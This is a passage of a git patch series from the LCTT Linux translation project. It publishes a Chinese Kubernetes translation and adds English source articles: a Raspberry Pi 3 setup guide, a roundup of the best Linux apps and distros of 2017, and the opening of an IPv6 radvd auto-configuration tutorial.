-本系列的第二部分将添加一个数据库,并尝试找出最好的方式来发展我们的应用程序。
-
-
-通过在所有环境中运行 Kubernetes,我们被迫在解决新问题的时候也尽量保持开发周期。我们不断尝试 Kubernetes,并越来越习惯它。通过这样做,开发团队都可以对生产环境负责,这并不困难,因为所有环境(从开发到生产)都以相同的方式进行管理。
-
-下一步是什么?
+### 下一步是什么?
我们将通过整合数据库和练习来继续这个系列,以找到使用 Kubernetes 获得数据库生命周期的最佳体验方法。
-这个 Kubernetes 系列是由 Redgate 研发部门的 Foundry 提供。我们正在努力使数据和容器的管理变得更加容易,所以如果您正在处理数据和容器,我们希望听到您的意见,请直接联系我们的开发团队。 [_foundry@red-gate.com_][6]
+这个 Kubernetes 系列是由 Redgate 研发部门 Foundry 提供。我们正在努力使数据和容器的管理变得更加容易,所以如果您正在处理数据和容器,我们希望听到您的意见,请直接联系我们的开发团队。 [_foundry@red-gate.com_][6]
+
* * *
-我们正在招聘。您是否有兴趣开发产品,创建[未来技术][7] 并采取类似创业的方法(没有风险)?看看我们的[软件工程师 - 未来技术][8]的角色吧,并阅读更多关于在 [英国剑桥][9]的 Redgate 工作的信息。
+我们正在招聘。您是否有兴趣开发产品、创建[未来技术][7] 并采取类似创业的方法(没有风险)?看看我们的[软件工程师 - 未来技术][8]的角色吧,并阅读更多关于在 [英国剑桥][9]的 Redgate 工作的信息。
+
--------------------------------------------------------------------------------
via: https://medium.com/ingeniouslysimple/adopting-kubernetes-step-by-step-f93093c13dfe
作者:[santiago arias][a]
译者:[aiwhj](https://github.com/aiwhj)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From b21c0b42990f8790919278fb195371d3fe15e542 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 6 Jan 2018 14:35:49 +0800
Subject: [PATCH 095/371] =?UTF-8?q?PUB:20171120=20Adopting=20Kubernetes=20?=
=?UTF-8?q?step=20by=C2=A0step.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@aiwhj https://linux.cn/article-9208-1.html
---
.../20171120 Adopting Kubernetes step by step.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171120 Adopting Kubernetes step by step.md (100%)
diff --git a/translated/tech/20171120 Adopting Kubernetes step by step.md b/published/20171120 Adopting Kubernetes step by step.md
similarity index 100%
rename from translated/tech/20171120 Adopting Kubernetes step by step.md
rename to published/20171120 Adopting Kubernetes step by step.md
From c704c7e2d22e2354f318dce053b45620f4230f97 Mon Sep 17 00:00:00 2001
From: XiaochenCui
Date: Sat, 6 Jan 2018 15:57:25 +0800
Subject: [PATCH 096/371] Remove translating information
Due to my personal ability, I can not translate the origional meaning
well. So I asked for the article to be forwarded to others.
---
sources/tech/20171211 A tour of containerd 1.0.md | 2 --
1 file changed, 2 deletions(-)
diff --git a/sources/tech/20171211 A tour of containerd 1.0.md b/sources/tech/20171211 A tour of containerd 1.0.md
index 64f4c1dbde..4cf3e2b587 100644
--- a/sources/tech/20171211 A tour of containerd 1.0.md
+++ b/sources/tech/20171211 A tour of containerd 1.0.md
@@ -1,7 +1,5 @@
A tour of containerd 1.0
======
-XiaochenCui translating
-
![containerd][1]
We have done a few talks in the past on different features of containerd, how it was designed, and some of the problems that we have fixed along the way. Containerd is used by Docker, Kubernetes CRI, and a few other projects but this is a post for people who may not know what containerd actually does within these platforms. I would like to do more posts on the feature set and design of containerd in the future but for now, we will start with the basics.
From fe5b1a6d04d7dfd68d2ed96453a4ac34aeae058f Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 17:44:02 +0800
Subject: [PATCH 097/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20A=20beginner?=
=?UTF-8?q?=E2=80=99s=20guide=20to=20Raspberry=20Pi=203?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...02 A beginner-s guide to Raspberry Pi 3.md | 114 ++++++++++++++++++
1 file changed, 114 insertions(+)
create mode 100644 sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
diff --git a/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md b/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
new file mode 100644
index 0000000000..1cc43f9627
--- /dev/null
+++ b/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
@@ -0,0 +1,114 @@
+A beginner’s guide to Raspberry Pi 3
+======
+![](https://images.techhive.com/images/article/2017/03/raspberry2-100711632-large.jpeg)
+This article is part of a weekly series where I'll create new projects using Raspberry Pi 3. The first article of the series focusses on getting you started and will cover the installation of Raspbian, with PIXEL desktop, setting up networking and some basics.
+
+### What you need:
+
+ * A Raspberry Pi 3
+ * A 5v 2mAh power supply with mini USB pin
+ * Micro SD card with at least 8GB capacity
+ * Wi-Fi or Ethernet cable
+ * Heat sink
+ * Keyboard and mouse
+ * a PC monitor
+ * A Mac or PC to prepare microSD card.
+
+
+
+There are many Linux-based operating systems available for Raspberry Pi that you can install directly, but if you're new to the Pi, I suggest NOOBS, the official OS installer for Raspberry Pi that simplifies the process of installing an OS on the device.
+
+Download NOOBS from [this link][1] on your system. It's a compressed .zip file. If you're on MacOS, just double click on it and MacOS will automatically uncompress the files. If you are on Windows, right-click on it, and select "extract here."
+
+ **[ Give yourself a technology career advantage with[InfoWorld's Deep Dive technology reports and Computerworld's career trends reports][2]. GET A 15% DISCOUNT through Jan. 15, 2017: Use code 8TIISZ4Z. ]**
+
+If you're running desktop Linux, then how to unzip it really depends on the desktop environment you are running, as different DEs have different ways of doing the same thing. So the easiest way is to use the command line.
+
+`$ unzip NOOBS.zip`
+
+Irrespective of the operating system, open the unzipped file and check if the file structure looks like this:
+
+![content][3] Swapnil Bhartiya
+
+Now plug the Micro SD card to your PC and format it to the FAT32 file system. On MacOS, use the Disk Utility tool and format the Micro SD card:
+
+![format][4] Swapnil Bhartiya
+
+On Windows, just right click on the card and choose the formatting option. If you're on desktop Linux, different DEs use different tools, and covering all the DEs is beyond the scope of this story. I have written a tutorial [using the command line interface on Linux][5] to format an SD card with Fat32 file system.
+
+Once you have the card formatted in the Fat32 partition, just copy the content of the downloaded NOOBS directory into the root directory of the device. If you are on MacOS or Linux, just rsync the content of NOOBS to the SD card. Open Terminal app in MacOS or Linux and run the rsync command in this format:
+
+`rsync -avzP /path_of_NOOBS /path_of_sdcard`
+
+Make sure to select the root directory of the sd card. In my case (on MacOS), it was:
+
+`rsync -avzP /Users/swapnil/Downloads/NOOBS_v2_2_0/ /Volumes/U/`
+
+Or you can copy and paste the content. Just make sure that all the files inside the NOOBS directory are copied into the root directory of the Micro SD Card and not inside any sub-directory.
+
+Now plug the Micro SD Card into the Raspberry Pi 3, connect the monitor, the keyboard and power supply. If you do have wired network, I recommend using it as you will get faster download speed to download and install the base operating system. The device will boot into NOOBS that offers a couple of distributions to install. Choose Raspbian from the first option and follow the on-screen instructions.
+
+![raspi config][6] Swapnil Bhartiya
+
+Once the installation is complete, Pi will reboot, and you will be greeted with Raspbian. Now it's time to configure it and run system updates. In most cases, we use Raspberry Pi in headless mode and manage it remotely over the networking using SSH. Which means you don't have to plug in a monitor or keyboard to manage your Pi.
+
+First of all, we need to configure the network if you are using Wi-Fi. Click on the network icon on the top panel, and select the network from the list and provide it with the password.
+
+![wireless][7] Swapnil Bhartiya
+
+Congrats, you are connected wirelessly. Before we proceed with the next step, we need to find the IP address of the device so we can manage it remotely.
+
+Open Terminal and run this command:
+
+`ifconfig`
+
+Now, note down the IP address of the device in the wlan0 section. It should be listed as "inet addr."
+
+Now it's time to enable SSH and configure the system. Open the terminal on Pi and open raspi-config tool.
+
+`sudo raspi-config`
+
+The default user and password for Raspberry Pi is "pi" and "raspberry" respectively. You'll need the password for the above command. The first option of Raspi Config tool is to change the default password, and I heavily recommend changing the password, especially if you want to use it over the network.
+
+The second option is to change the hostname, which can be useful if you have more than one Pi on the network. A hostname makes it easier to identify each device on the network.
+
+Then go to Interfacing Options and enable Camera, SSH, and VNC. If you're using the device for an application that involves multimedia, such as a home theater system or PC, then you may also want to change the audio output option. By default the output is set to HDMI, but if you're using external speakers, you need to change the set-up. Go to the Advanced Option tab of Raspi Config tool, and go to Audio. There choose 3.5mm as the default out.
+
+[Tip: Use arrow keys to navigate and then Enter key to choose. ]
+
+Once all these changes are applied, the Pi will reboot. You can unplug the monitor and keyboard from your Pi as we will be managing it over the network. Now open Terminal on your local machine. If you're on Windows, you can use Putty or read my article to install Ubuntu Bash on Windows 10.
+
+Then ssh into your system:
+
+`ssh pi@IP_ADDRESS_OF_Pi`
+
+In my case it was:
+
+`ssh pi@10.0.0.161`
+
+Provide it with the password and Eureka!, you are logged into your Pi and can now manage the device from a remote machine. If you want to manage your Raspberry Pi over the Internet, read my article on [enabling RealVNC on your machine][8].
+
+In the next follow-up article, I will talk about using Raspberry Pi to manage your 3D printer remotely.
+
+**This article is published as part of the IDG Contributor Network.[Want to Join?][9]**
+
+--------------------------------------------------------------------------------
+
+via: https://www.infoworld.com/article/3176488/linux/a-beginner-s-guide-to-raspberry-pi-3.html
+
+作者:[Swapnil Bhartiya][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.infoworld.com/author/Swapnil-Bhartiya/
+[1]:https://www.raspberrypi.org/downloads/noobs/
+[2]:http://idgenterprise.selz.com
+[3]:https://images.techhive.com/images/article/2017/03/content-100711633-large.jpg
+[4]:https://images.techhive.com/images/article/2017/03/format-100711635-large.jpg
+[5]:http://www.cio.com/article/3176034/linux/how-to-format-an-sd-card-in-linux.html
+[6]:https://images.techhive.com/images/article/2017/03/raspi-config-100711634-large.jpg
+[7]:https://images.techhive.com/images/article/2017/03/wireless-100711636-large.jpeg
+[8]:http://www.infoworld.com/article/3171682/internet-of-things/how-to-access-your-raspberry-pi-remotely-over-the-internet.html
+[9]:https://www.infoworld.com/contributor-network/signup.html
From 6e6e17d00f9f00fcde752e9129b47b8f5f2226b8 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 17:46:31 +0800
Subject: [PATCH 098/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20The=20Best=20Linu?=
=?UTF-8?q?x=20Apps=20&=20Distros=20of=202017?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...4 The Best Linux Apps - Distros of 2017.md | 290 ++++++++++++++++++
1 file changed, 290 insertions(+)
create mode 100644 sources/tech/20171214 The Best Linux Apps - Distros of 2017.md
diff --git a/sources/tech/20171214 The Best Linux Apps - Distros of 2017.md b/sources/tech/20171214 The Best Linux Apps - Distros of 2017.md
new file mode 100644
index 0000000000..1491ff1157
--- /dev/null
+++ b/sources/tech/20171214 The Best Linux Apps - Distros of 2017.md
@@ -0,0 +1,290 @@
+The Best Linux Apps & Distros of 2017
+======
+[![best linux distros 2017][1]][2]
+
+**In this post we look back at the best Linux distro and app releases that helped define 2017.**
+
+'2017 was a fantastic year for Ubuntu and for Linux in general. I can't wait to see what comes next'
+
+And boy were there a lot of 'em!
+
+So join us (ideally with from a warm glass of something non-offensive and sweet) as we take a tart look backwards through some key releases from the past 12 months.
+
+This list is not presented in any sort of order, and all of the entries were sourced from **YOUR** feedback to the survey we shared earlier in the week. If your favourite release didn 't make the list, it's because not enough people voted for it!
+
+Regardless of your opinions on the apps and Linux distros that are highlighted I'm sure you'll agree that 2017 was a great year for Linux as a platform and for Linux users.
+
+But enough waffle: on we go!
+
+## Distros
+
+### 1\. Ubuntu 17.10 'Artful Aardvark'
+
+[![Ubuntu 17.10 desktop screenshot][3]][4]
+
+There's no doubt about it: Ubuntu 17.10 was the year's **biggest** Linux release -- by a clear margin.
+
+'Ubuntu 17.10 was the year's biggest Linux distro release'
+
+Canonical [dropped a bombshell in April][5] when it announced it was abandoning its home-grown Unity desktop and jettisoning its (poorly received) mobile ambitions. Most of us were shocked, and few would've been surprised had the distro maker opted to take some time out to figure out what it went next.
+
+But that …That's just not the Ubuntu way.
+
+Canonical dived right into developing Ubuntu 17.10 'Artful Aardvark', healing some long held divisions in the process.
+
+Part reset, part gamble; the Artful Aardvark had the arduous task of replacing the bespoke (patched, forked) Unity desktop with upstream GNOME Shell. It also [opted to make the switch][6] to the new-fangled [Wayland display server protocol][7] by default, too.
+
+Amazingly, thanks a mix of grit and goodwill, it succeeded. The [Ubuntu 17.10 release][8] emerged on time on October 19, 2017 where it was greeted by warm reviews and a sense of relief!
+
+The recurring theme among the [Ubuntu 17.10 reviews][9] was the Artful Aardvark was a real **return to form** for the distro. It got people excited about Ubuntu for the first time in a long time.
+
+And with an long-term support release next up, long may the enthusiasm for it continue!
+
+### 2\. Solus 3
+
+[![][10]][11]
+
+We knew 2017 was going to be a big year for the Solus Linux distro, which is why it made our list of [Linux distros we were most excited for][12] this year.
+
+'Solus is fast becoming the Linux aficionados' main alternative to Arch'
+
+Solus is unique distro in that it's not based on another. It uses its home grown Budgie desktop by default, has its own package manager (eopkg) and update procedure, and sets its own criteria for app curation. Solus also backs Canonical's Flatpak rival Snappy.
+
+The [release of Solus 3][13] in the summer was a particular highlight for this upstart distro. The update packs in improvements across the board, touching on everything from kernel security through to multimedia upgrades.
+
+Solus 3 also arrived with [Budgie 10.4][14]. A massive upgrade to this GTK-based desktop environment, Budgie 10.4 brings (among other things) greater customisation, a new Settings app, multiple new panel options, applets and transparency, and an improved Raven sidebar.
+
+Fast becoming the Linux aficionados' main alternative to Arch Linux, Solus is a Linux distro that's going places.
+
+If you like the look of Budgie you can use it on Ubuntu without damaging your existing desktop. See our [how to install Budgie 10.4 on Ubuntu][14] article for all the necessary details.
+
+If you get bored over the holidays I highly recommended you [download the Solus MATE edition][15] too. It combines the strength of Solus with the meticulously maintained MATE desktop, a combination that works incredibly well together.
+
+### 3\. Fedora 27
+
+[![][16]][17]
+
+We're not oblivious to what happens beyond the orange bubble and the release of [Fedora 27 Workstation][18] marked another fine update from the folks who like to wear red hats.
+
+Fedora 27 features GNOME 3.26 (and all the niceties that brings, like color emoji support, folder sharing in Boxes, and so on), ships with LibreOffice 5.4, and "simplifies container storage, delivers containerized services by default" using RedHat's use no-cost RHEL Developer subscriptions.
+
+[Redhat Press Release for Fedora 27][19]
+
+## Apps
+
+### 4\. Firefox 57 (aka 'Firefox Quantum').
+
+[![firefox quantum on ubuntu][20]][21]
+
+Ubuntu wasn't the only open-source project to undergo something of 'renewal' this year.
+
+'Like Ubuntu, Firefox finally got its mojo back this year'
+
+After years of slow decline and feature creep Mozilla finally did something about Firefox Google Chrome.
+
+Firefox 57 is such a big release that it even has its own name: Firefox Quantum. And the release truly is a quantum leap in performance and responsiveness. The browser is now speedier than Chrome, makes intelligent use of multi-threaded processes, and has a sleek new look that feels right.
+
+Like Ubuntu, Firefox has got its mojo back.
+
+Firefox will roll out support for client side decoration on the GNOME desktop (a feature already available in the latest nightly builds) sometime in 2018. This feature, along with further refinements to the finely-tuned under-the-hood mechanics, will add more icing atop an already fantastic base!
+
+### 5\. Ubuntu for Windows
+
+[![][22]][23]
+
+Yes, I know: it's a little bit odd to list a Windows release in a run-down of Linux releases -- but there is a logic to it!
+
+Ubuntu on the Windows Store is an admission writ large that Linux is an integral part of the modern software development
+
+The arrival of [Ubuntu on the Windows Store][24] (along with other Linux distributions) in July was a pretty bizarre sight to see.
+
+Few could've imagined Microsoft would ever accede to Linux in such a visible manner. Remember: it didn't sneak Linux distros in the through the back door, it went out and boasted about it!
+
+Some (perhaps rightly) remain uneasy and/or somewhat suspicious over Microsoft's sudden embrace of 'all things open source'. Me? I'm less concerned. Microsoft isn't the hulking great giant it once was, and Linux has become so ubiquitous that the Redmond-based company simply can't ignore it.
+
+The stocking of Ubuntu, openSUSE and Fedora on the shelves of the Windows Store (albeit for developers) is an admission writ large that Linux is an integral part of the modern software development ecosystem, and one they simply can't replicate, replace or rip-off.
+
+For many regular Linux will always be preferable to the rather odd hybrid that is the Windows Subsystem for Linux (WSL). But for others, mandated to use Microsoft products for work or study, the leeway to use Linux is a blessing.
+
+### 6\. GIMP 2.9.6
+
+[![gimp on ubuntu graphic][25]][26]
+
+We've written a fair bit about GIMP this year. The famous image editor has benefit from a spur of development activity. We started the year off by talking about the [features in GIMP 2.10][27] we were expecting to see.
+
+While GIMP 2.10 itself didn't see release in 2017 two sizeable development updates did: GIMP 2.9.6 & GIMP 2.9.8.
+
+The former of these added ** experimental multi-threading in GEGL** (a fancy way of saying the app can now make better use of multi-core processors). It also added HiDPI tweaks, introduced color coded layer tags, added metadata editor, new filters, crop presets and -- take a breath -- improved the 'quit' dialog.
+
+### 7\. GNOME Desktop
+
+[![GNOME 3.26 desktop with apps][28]][29]
+
+While not strictly and app or a distro release, there were 2 GNOME releases in 2017: the feature-filled [GNOME 3.24 release][30] in March; and the iterative follow-up [GNOME 3.26][31] in September.
+
+Both release came packed full of new features, and both bought an assembly of refinements, improvements and adjustments,
+
+**GNOME 3.24 ** features included Night Light, a blue-light filter that can help improve natural sleeping patterns; a new desktop Recipes app; and added short weather forecast snippets to the Message Try.
+
+**GNOME 3.26** built on the preceding release. It improves the look, feel and responsiveness of the GNOME Shell UI; revamped the Settings apps with a new layout and access to more options; integrates Firefox Sync support with the Web browser app; and tweaks the window animation effects (a bit of a trend this year) to create a more fluid feeling desktop.
+
+GNOME isn't stopping there. GNOME 3.28 is due for release in March with plenty more changes, improvements and app updates planned. GNOME 3.28 is looking like it will be used in Ubuntu 18.04 LTS.
+
+### 8\. Atom IDE
+
+[![Atom IDE][32]][32]
+
+This year was ripe with code editors, with Sublime Text 3, Visual Studio Code, Atom, Adobe Brackets, Gedit and many others relating updates.
+
+But, for me, it was rather sudden appearance of **Atom IDE ** that caught my attention.
+
+[Atom IDE][33] is a set of packages for the Atom code editor that add more traditional [IDE][34] capabilities like context-aware auto-completion, code navigation, diagnostics, and document formatting.
+
+### 9\. Stacer 1.0.8
+
+[![Stacer is an Ubuntu cleaner app][35]][36]
+
+A system cleaner might not sound like the most exciting of tools but **Stacer** makes housekeeping a rather appealing task.
+
+This year the app binned its Electron-built base in favour of a native C++ core, leading to various performance improvements as a result.
+
+Stacer has 8 dedicated sections offering control over system maintenance duties, including:
+
+ * **Monitor system resources including CPU**
+ * **Clear caches, logs, obsolete packages etc**
+ * **Bulk remove apps and packages**
+ * **Add/edit/disable start-up applications**
+
+
+
+The app is now my go-to recommendation for anyone looking for an Ubuntu system cleaner. Which reminds me: I should get around to adding the app to our list of ways to [free up space on Ubuntu][37]… Chores, huh?!
+
+### 10\. Geary 0.12
+
+[![Geary 0.11 on Ubuntu 16.04][38]][39]
+
+The best alternative to Thunderbird on Linux has to be **Geary, ** the open-source email app that works brilliantly with Gmail and other webmail accounts.
+
+In October [Geary 0.12 was released][40]. This huge update adds a couple of new features to the app and a bucket-load of improvements the ones it already boasts.
+
+Among the (many) highlights in the Geary 0.12:
+
+ * **Inline images in the email composer**
+ * **Improved interface when displaying conversations**
+ * **Support message archiving for Yahoo! Mail and Outlook.com**
+ * **Keyboard navigation for conversations**
+
+
+
+Geary 0.12 is available to install on Ubuntu 16.04 LTS and above from the [official Geary PPA][41]. If you're tired of Thunderbird (and the [gorgeous Montrail theme][42] doesn't make it more palatable) I recommend giving Geary a go.
+
+## Other Odds & Ends
+
+I said at the outset that it had been a busy year -- and it really has been. Writing a post like this is always a thankless task. So many app, script, theme, and distribution releases happen throughout the year, the majority bringing plenty to the table. I don't want to miss anyone or anything out -- but I must if I ever want to hit publish!
+
+### Flathub
+
+[![flathub screenshot][43]][44]
+
+All this talk of apps means I have to mention the launch of [Flathub][45] this year.
+
+Flathub is the de facto [Flatpak][46] app store; a centralised repository where the latest versions of your favourite apps live.
+
+Flatpak really needed something like **Flathub** , and so did users. Now it's really easy to install the latest release of a slate of apps on pretty much any Linux distribution, without having to stress about package dependencies or conflicts.
+
+Among the apps you can install from Flathub:
+
+ * **Corebird**
+ * **Spotify**
+ * **SuperTuxKart**
+ * **VLC**
+ * **Discord**
+
+
+ * **Telegram Desktop**
+ * **Atom**
+ * **GIMP**
+ * **Geary**
+ * **Skype**
+
+
+
+And the list is still growing!
+
+### And! And! And!
+
+Other apps we loved this year include [continued improvement][47]s to the **Corebird** Twitter client, some [useful new options][48] in the animated Gif maker **Peek** , as well as the arrival of Nylas Mail fork **Mailspring ** and the promising GTK audiobook player **Cozy**.
+
+**Skype** bought a [bold new look][49] to VoIP fans on Linux desktops, **LibreOffice** (as always) served up continued improvements, and **Signal** launched a [dedicated desktop app.][50].
+
+A big **CrossOver** update means you can now [run Microsoft Office 2016 on Linux][51]; and we got a handy wizard that makes it easy to [install Adobe Creative Cloud on Linux][52].
+
+**What was your favourite Linux related release of 2017? Let us know in the comments!**
+
+Wondering where the games are? Don't panic! We cover the best Linux games of 2017 in a separate post, which we'll published tomorrow.
+
+
+
+--------------------------------------------------------------------------------
+
+via: http://www.omgubuntu.co.uk/2017/12/list-best-linux-distros-apps-2017
+
+作者:[Joey Sneddon][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://plus.google.com/117485690627814051450/?rel=author
+[1]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/best-linux-distros-2017-750x421.jpg
+[2]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/best-linux-distros-2017.jpg
+[3]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/10/ubuntu-17.10-desktop.jpg (Ubuntu 17.10 desktop screenshot)
+[4]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/10/ubuntu-17.10-desktop.jpg
+[5]:http://www.omgubuntu.co.uk/2017/04/ubuntu-18-04-ship-gnome-desktop-not-unity
+[6]:http://www.omgubuntu.co.uk/2017/08/ubuntu-confirm-wayland-default-17-10
+[7]:https://en.wikipedia.org/wiki/Wayland_(display_server_protocol)
+[8]:http://www.omgubuntu.co.uk/2017/10/ubuntu-17-10-release-features
+[9]:http://www.omgubuntu.co.uk/2017/10/ubuntu-17-10-review-roundup
+[10]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/Budgie-750x422.jpg
+[11]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/Budgie.jpg
+[12]:http://www.omgubuntu.co.uk/2016/12/6-linux-distributions-2017
+[13]:https://solus-project.com/2017/08/15/solus-3-released/
+[14]:http://www.omgubuntu.co.uk/2017/08/install-budgie-desktop-10-4-on-ubuntu
+[15]:https://soluslond1iso.stroblindustries.com/Solus-3-MATE.iso
+[16]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/firefox-csd-fedora-from-reddit-750x415.png
+[17]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/firefox-csd-fedora-from-reddit.png
+[18]:https://fedoramagazine.org/whats-new-fedora-27-workstation/
+[19]:https://www.redhat.com/en/about/press-releases/fedora-27-now-generally-available (Redhat Press Release )
+[20]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/firefox-quantum-ubuntu-screenshot-750x448.jpg (Firefox 57 screenshot on Linux)
+[21]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/firefox-quantum-ubuntu-screenshot.jpg
+[22]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/07/windows-facebook-750x394.jpg
+[23]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/07/windows-facebook.jpg
+[24]:http://www.omgubuntu.co.uk/2017/07/ubuntu-now-available-windows-store
+[25]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/01/gimp-750x422.jpg
+[26]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/01/gimp.jpg
+[27]:http://www.omgubuntu.co.uk/2017/01/plans-for-gimp-2-10
+[28]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/09/GNOME-326-apps-750x469.jpg
+[29]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/09/GNOME-326-apps.jpg
+[30]:http://www.omgubuntu.co.uk/2017/03/gnome-3-24-released-new-features
+[31]:http://www.omgubuntu.co.uk/2017/09/gnome-3-26-officially-released
+[32]:https://i.imgur.com/V9DTnL3.jpg
+[33]:http://blog.atom.io/2017/09/12/announcing-atom-ide.html
+[34]:https://en.wikipedia.org/wiki/Integrated_development_environment
+[35]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/08/stacer-ubuntu-cleaner-app-350x200.jpg
+[36]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/08/stacer-ubuntu-cleaner-app.jpg
+[37]:http://www.omgubuntu.co.uk/2016/08/5-ways-free-up-space-on-ubuntu
+[38]:http://www.omgubuntu.co.uk/wp-content/uploads/2016/05/geary-11-1-350x200.jpg
+[39]:http://www.omgubuntu.co.uk/wp-content/uploads/2016/05/geary-11-1.jpg
+[40]:http://www.omgubuntu.co.uk/2017/10/install-geary-0-12-on-ubuntu
+[41]:https://launchpad.net/~geary-team/+archive/ubuntu/releases
+[42]:http://www.omgubuntu.co.uk/2017/04/a-modern-thunderbird-theme-font
+[43]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/09/flathub-apps-750x345.jpg
+[44]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/09/flathub-apps.jpg
+[45]:http://www.flathub.org/
+[46]:https://en.wikipedia.org/wiki/Flatpak
+[47]:http://www.omgubuntu.co.uk/2017/10/gtk-twitter-app-corebird-pushed-new-release
+[48]:http://www.omgubuntu.co.uk/2017/11/linux-release-roundup-peek-gthumb-more
+[49]:http://www.omgubuntu.co.uk/2017/10/new-look-skype-for-desktop-released
+[50]:http://www.omgubuntu.co.uk/2017/11/signal-desktop-app-released
+[51]:http://www.omgubuntu.co.uk/2017/12/crossover-17-linux
+[52]:http://www.omgubuntu.co.uk/2017/10/install-adobe-creative-cloud-linux
From 5abb273bdd49b3b91a8434a287977a02a3f38de8 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 17:48:13 +0800
Subject: [PATCH 099/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20IPv6=20Auto-Confi?=
=?UTF-8?q?guration=20in=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...171214 IPv6 Auto-Configuration in Linux.md | 109 ++++++++++++++++++
1 file changed, 109 insertions(+)
create mode 100644 sources/tech/20171214 IPv6 Auto-Configuration in Linux.md
diff --git a/sources/tech/20171214 IPv6 Auto-Configuration in Linux.md b/sources/tech/20171214 IPv6 Auto-Configuration in Linux.md
new file mode 100644
index 0000000000..85108d8b6f
--- /dev/null
+++ b/sources/tech/20171214 IPv6 Auto-Configuration in Linux.md
@@ -0,0 +1,109 @@
+IPv6 Auto-Configuration in Linux
+======
+
+![](http://www.omgubuntu.co.uk)
+
+In [Testing IPv6 Networking in KVM: Part 1][1], we learned about unique local addresses (ULAs). In this article, we will learn how to set up automatic IP address configuration for ULAs.
+
+### When to Use Unique Local Addresses
+
+Unique local addresses use the fd00::/8 address block, and are similar to our old friends the IPv4 private address classes: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16. But they are not intended as a direct replacement. IPv4 private address classes and network address translation (NAT) were created to alleviate the shortage of IPv4 addresses, a clever hack that prolonged the life of IPv4 for years after it should have been replaced. IPv6 supports NAT, but I can't think of a good reason to use it. IPv6 isn't just bigger IPv4; it is different and needs different thinking.
+
+So what's the point of ULAs, especially when we have link-local addresses (fe80::/10) and don't even need to configure them? There are two important differences. One, link-local addresses are not routable, so you can't cross subnets. Two, you control ULAs; choose your own addresses, make subnets, and they are routable.
+
+Another benefit of ULAs is you don't need an allocation of global unicast IPv6 addresses just for mucking around on your LAN. If you have an allocation from a service provider then you don't need ULAs. You can mix global unicast addresses and ULAs on the same network, but I can't think of a good reason to have both, and for darned sure you don't want to use network address translation (NAT) to make ULAs publicly accessible. That, in my peerless opinion, is daft.
+
+ULAs are for private networks only and should be blocked from leaving your network, and not allowed to roam the Internet. Which should be simple, just block the whole fd00::/8 range on your border devices.
+
+### Address Auto-Configuration
+
+ULAs are not automatic like link-local addresses, but setting up auto-configuration is easy as pie with radvd, the router advertisement daemon. Before you change anything, run `ifconfig` or `ip addr show` to see your existing IP addresses.
+
+You should install radvd on a dedicated router for production use, but for testing you can install it on any Linux PC on your network. In my little KVM test lab, I installed it on Ubuntu, `apt-get install radvd`. It should not start after installation, because there is no configuration file:
+```
+$ sudo systemctl status radvd
+● radvd.service - LSB: Router Advertising Daemon
+ Loaded: loaded (/etc/init.d/radvd; bad; vendor preset: enabled)
+ Active: active (exited) since Mon 2017-12-11 20:08:25 PST; 4min 59s ago
+ Docs: man:systemd-sysv-generator(8)
+
+Dec 11 20:08:25 ubunut1 systemd[1]: Starting LSB: Router Advertising Daemon...
+Dec 11 20:08:25 ubunut1 radvd[3541]: Starting radvd:
+Dec 11 20:08:25 ubunut1 radvd[3541]: * /etc/radvd.conf does not exist or is empty.
+Dec 11 20:08:25 ubunut1 radvd[3541]: * See /usr/share/doc/radvd/README.Debian
+Dec 11 20:08:25 ubunut1 radvd[3541]: * radvd will *not* be started.
+Dec 11 20:08:25 ubunut1 systemd[1]: Started LSB: Router Advertising Daemon.
+
+```
+
